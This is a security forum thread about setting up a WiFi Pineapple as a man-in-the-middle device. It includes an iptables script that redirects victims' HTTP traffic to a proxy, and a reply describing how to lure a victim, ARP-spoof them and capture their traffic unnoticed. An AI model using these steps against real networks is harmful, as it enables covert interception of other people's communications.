Jump to content
M@s0n

WiFi pineapple MITM with Kali

Recommended Posts

Hi everyone,

I use the Wi-Fi pineapple as a man in the middle Device Redirecting all traffic to a Laptop That the Wi-Fi pineapple is tethered to, Similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/

So here's my setup, 

MacBook running linux VM (Virtual box) Connected via USB To the Wi-Fi pineapple That's sending all traffic To the virtual box Machine

: Pardon my diagram skills :(

Here describe that I have created Based off of the post Above, HoweverI don't think this is ideal since you would need to ssh into the pineapple to run this script every time. Ideally it would be best to do this via the web interface of the pineapple via a simple "enable proxy" button etc. Any feedback would be appreciated.

 

#!/bin/bash

if [[ $# -eq 0 ]] ; then
    echo "Usage: $0 (enable|disable)"
    exit 1
fi

action="$1"
case $action in
    enable)
      echo "Enabling ..."
      iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
      iptables -t nat -A POSTROUTING -j MASQUERADE
    ;;
    disable)
      echo "Disabling ..."
      iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
    ;;
    *)
      echo "Usage: $0 (enable|disable)"
      exit 1
    ;;
esac

 

Screen Shot 2017-04-20 at 3.43.38 PM.png

Edited by M@s0n

Share this post


Link to post
Share on other sites

Are you also trying to serve internet to the pineapple network?

One easy, "hacky" way I have gotten this to work is to use USB port to connect a third radio (The RT5370 as example). This allows you to connect the pineapple to a wifi network, and serve internet that way. This allows you to bypass the "need" to tether. So effectively now your pineapple has become the next hop for anything that connects to the network being served from the pineapple.

Start PineAP, and get a "victim" to connect to your pineapple. Victim would also have internet provided through the wireless connection from the third USB radio.

Then I'll connect my "attack" box (IE: Kali) to the network that the pineapple is serving. Using the clinet list, figure out the MAC address of the victim. From there, the quick and dirty approach is to arpspoof the traffic, allow IP forwarding on your attack box so that the traffic flows. The client likely wont be any wiser to it unless he\she is keeping a close eye on his arp tables.

Now you can capture whatever traffic you wanted as your attack box is now forwarding every packet that passes between the AP (your pineapple) and the victim. From there you can shark the traffic, ettercap, etc ....

Again, im not saying this is the best way to do, far from it. I'm just throwing out a quick and dirty way to get it up and running.

Edited by Captain

Share this post


Link to post
Share on other sites
On 21/04/2017 at 3:48 AM, M@s0n said:

Hi everyone,

I would like to use the Wi-Fi pineapple as a man in the middle Device Redirecting all traffic to a Laptop That the Wi-Fi pineapple is tethered to, Similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/

So here's my setup, 

MacBook running linux VM (Virtual box) Connected via USB To the Wi-Fi pineapple That's sending all traffic To the virtual box Machine

: Pardon my diagram skills :(

Here describe that I have created Based off of the post Above, HoweverI don't think this is ideal. Any feedback would be appreciated.

 

#!/bin/bash

if [[ $# -eq 0 ]] ; then
    echo "Usage: $0 (enable|disable)"
    exit 1
fi

action="$1"
case $action in
    enable)
      echo "Enabling ..."
      iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
      iptables -t nat -A POSTROUTING -j MASQUERADE
    ;;
    disable)
      echo "Disabling ..."
      iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
    ;;
    *)
      echo "Usage: $0 (enable|disable)"
      exit 1
    ;;
esac

 

Screen Shot 2017-04-20 at 3.43.38 PM.png

Can you elaborate why this setup is not ideal?  If it is not working, try using 192.168.1.2 as the destination ip. 

Share this post


Link to post
Share on other sites

Updated my question, sorry for the confusion.

On 4/25/2017 at 10:16 AM, esa said:

Can you elaborate why this setup is not ideal?  If it is not working, try using 192.168.1.2 as the destination ip. 

 

Share this post


Link to post
Share on other sites
On 4/20/2017 at 0:48 PM, M@s0n said:

Hi everyone,

I use the Wi-Fi pineapple as a man in the middle Device Redirecting all traffic to a Laptop That the Wi-Fi pineapple is tethered to, Similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/

 

 

Yeah, I ran across that article too when wanting to do bettercap on my laptop or pi with the nano.  I knew there had to be an easier way to do it without messing with the tables on the nano since when you are tethering you are already routing traffic from it.

Here is a link to my thread.  In the middle is the site and solution I did to do bettercap mitm.  No modifying of iptables on the nano necessary.

 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...